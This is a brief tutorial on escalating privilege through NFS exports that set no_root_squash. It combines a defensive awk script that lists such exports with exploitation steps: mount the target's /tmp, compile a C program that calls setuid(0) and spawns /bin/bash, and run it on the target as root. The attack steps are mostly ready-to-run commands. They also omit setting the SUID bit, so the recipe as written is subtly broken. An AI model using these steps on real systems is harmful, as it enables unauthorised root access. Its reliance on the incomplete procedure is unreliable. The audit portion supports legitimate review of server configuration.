NFS Root Squashing
Enumeration
cat /etc/exports
In our example, the "no_root_squash" option is defined for the /tmp export, so a remote root user keeps root privileges on the files it creates there. The folder is shared and can be mounted.
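The same check can be scripted when reviewing a server. This is an added example, not part of the original page: it lists every export entry that sets no_root_squash. The function names and the sample exports content are constructed for illustration, and quoted paths and "-" default option lists are not handled.

```shell
#!/bin/sh
# Constructed sample of an /etc/exports file (not taken from a real host).
sample_exports() {
    cat <<'EOF'
# constructed sample
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home 10.0.0.0/24(rw,root_squash)
/srv/data host1(ro) \
          host2(rw,no_root_squash)
EOF
}

# audit_exports [FILE]
# Prints "export-path client" for every client entry whose option list
# contains no_root_squash. Reads standard input when FILE is omitted.
audit_exports() {
    awk '
    {
        sub(/#.*/, "")                      # drop comments
        if (sub(/\\$/, "")) {               # trailing backslash: line continues
            buf = buf $0 " "
            next
        }
        $0 = buf $0                         # rebuild the full logical line
        buf = ""
        for (i = 2; i <= NF; i++) {         # field 1 is the path, the rest are clients
            client = $i
            opts = ""
            p = index($i, "(")
            if (p > 0) {
                client = substr($i, 1, p - 1)
                opts = substr($i, p + 1)
                sub(/\)$/, "", opts)
            }
            if (client == "") client = "*"  # "(opts)" without a host means everyone
            if (("," opts ",") ~ /,no_root_squash,/) print $1, client
        }
    }' "${1:--}"
}

# Demo on the constructed sample; on a server, run: audit_exports /etc/exports
sample_exports | audit_exports
```

Any line this prints is an export where root_squash (the default) has been turned off and should be reviewed.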
Exploitation
On our attacking machine
showmount -e IP-OF-TARGET
List the mountable folders of our target.
mkdir /tmp/1
mount -o rw,vers=2 10.10.32.193:/tmp /tmp/1
We mount our folder.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
On our target
/tmp/x
We can execute our binary.
We should be root!